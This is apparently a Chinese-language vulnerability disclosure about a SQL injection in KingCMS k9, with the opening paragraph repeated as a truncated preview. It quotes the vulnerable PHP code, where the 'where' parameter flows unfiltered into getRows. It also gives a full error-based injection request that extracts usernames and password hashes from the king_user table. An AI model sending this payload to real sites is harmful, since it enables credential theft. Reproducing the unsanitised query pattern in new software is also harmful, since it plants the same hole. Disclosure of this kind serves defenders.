### 简要描述: KingCms最新版(k9)注入1枚 ### 详细说明: 朋友的公司想购买kingcms的授权,让我帮忙看下。发现kingcms很长一段时间没更新了,憋了一段时间放出了最新版的k9(2014-12-13更新),官网下下来学习一下。 在wooyun上看到了几个漏洞,如: [WooYun: kingcms最新版sql注入漏洞](http://www.wooyun.org/bugs/wooyun-2013-043520) 注入点:POST /apps/cuxiao/index.php HTTP/1.1 注入参数:where 问题文件在/apps/cuxiao/index.php ``` function _create(){ $u=new user;$u->auth_role('cuxiao'); $db=new db; $cmd=kc_get('cmd',array('categroy','content')); $file=new file; if($cmd=='content'){ $where=kc_get('where',0,1); $pid=kc_get('pid',2,1); $rn=kc_get('rn',2,1); $limit=($rn*($pid-1)).','.$rn.';'; $pcount=kc_get('pcount',2,1); $start=$rn*$pid>$pcount?$pcount:$rn*$pid; $res=$db->getRows('%s_cuxiao','*',$where,'',$limit); foreach($res as $rs){ //process file to rela path $rs['TEMPLATE']='cuxiao/info.php'; $file->create($rs['url'],$rs,'apps/cuxiao/_info.php'); } /* }else if($cmd=='area' || $cmd=='cat'){ $res=$db->getRows('%s_node','*',$where,'',$limit); foreach($res as $rs){ $fpath="cuxiao/{$rs['url']}/";...
### 简要描述: KingCms最新版(k9)注入1枚 ### 详细说明: 朋友的公司想购买kingcms的授权,让我帮忙看下。发现kingcms很长一段时间没更新了,憋了一段时间放出了最新版的k9(2014-12-13更新),官网下下来学习一下。 在wooyun上看到了几个漏洞,如: [WooYun: kingcms最新版sql注入漏洞](http://www.wooyun.org/bugs/wooyun-2013-043520) 注入点:POST /apps/cuxiao/index.php HTTP/1.1 注入参数:where 问题文件在/apps/cuxiao/index.php ``` function _create(){ $u=new user;$u->auth_role('cuxiao'); $db=new db; $cmd=kc_get('cmd',array('categroy','content')); $file=new file; if($cmd=='content'){ $where=kc_get('where',0,1); $pid=kc_get('pid',2,1); $rn=kc_get('rn',2,1); $limit=($rn*($pid-1)).','.$rn.';'; $pcount=kc_get('pcount',2,1); $start=$rn*$pid>$pcount?$pcount:$rn*$pid; $res=$db->getRows('%s_cuxiao','*',$where,'',$limit); foreach($res as $rs){ //process file to rela path $rs['TEMPLATE']='cuxiao/info.php'; $file->create($rs['url'],$rs,'apps/cuxiao/_info.php'); } /* }else if($cmd=='area' || $cmd=='cat'){ $res=$db->getRows('%s_node','*',$where,'',$limit); foreach($res as $rs){ $fpath="cuxiao/{$rs['url']}/"; $file->create($fpath,$rs,'apps/cuxiao/_node.php'); } */ }else if($cmd=='categroy'){ //遍历地区 $node=new node; $areas=$node->getRows('area'); $types=$node->getRows('cuxiao_type');//$db->getRows('%s_node','url,name','cid=6'); //$areas=$db->getRows('%s_node','url,name','cid=1'); foreach($areas as $a){ //遍历分类 foreach($types as $t){ $fpath=kc_config('cuxiao.dir').$a['url'].'_'.$t['url'].'/';//"{$a['url']}_{$t['url']}/"; $array=array( 'title'=>$a['name']."所有".$t['name'].'促销信息', 'where'=>"status=1 and online=1 and area='{$a['url']}' and type='{$t['url']}'", 'area'=>$a['url'], 'type'=>$t['url'], 'TEMPLATE'=>'cuxiao/categroy.php', ); $file->create($fpath,$array); } 无关代码 ``` $_POST['where']没有经过处理就进入了$db->getRows,去看看$db->getRows ``` public function getRows($table,$insql='*',$where=null,$order=null,$limit=null,$group=null) { $table=str_replace('%s',DB_PRE,$table); $sql="SELECT $insql FROM $table "; $sql.= empty($where) ? '' : " WHERE $where"; $sql.= empty($group) ? '' : " GROUP BY $group"; $sql.= empty($order) ? '' : " ORDER BY $order"; $sql.= empty($limit) ? '' : " LIMIT $limit"; return $this->get($sql); } ``` 在执行sql语句之前,也没有过滤,这里就造成了注入。 Kingcms可以报错,因此 Payload: ``` jsoncallback=1&_=11&URL=http%3A%2F%2Flocalhost%2Fapps%2Fcontent%2Fcategroy.php&CMD=create&TID=1&AJAX=1&USERID=10000&SIGN=89ee81f5f1f328f555ceb7e7655d9f2f&pid=1&rn=2&cmd=content&pcount=1&where=0 UNION SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,userpass)FROM king_user LIMIT 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a%23 ``` 注入成功,见下图 [<img src="https://images.seebug.org/upload/201503/130059017904de9f879d84c3267ce6b333a00167.jpg" alt="成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/130059017904de9f879d84c3267ce6b333a00167.jpg) ### 漏洞证明: 见 详细说明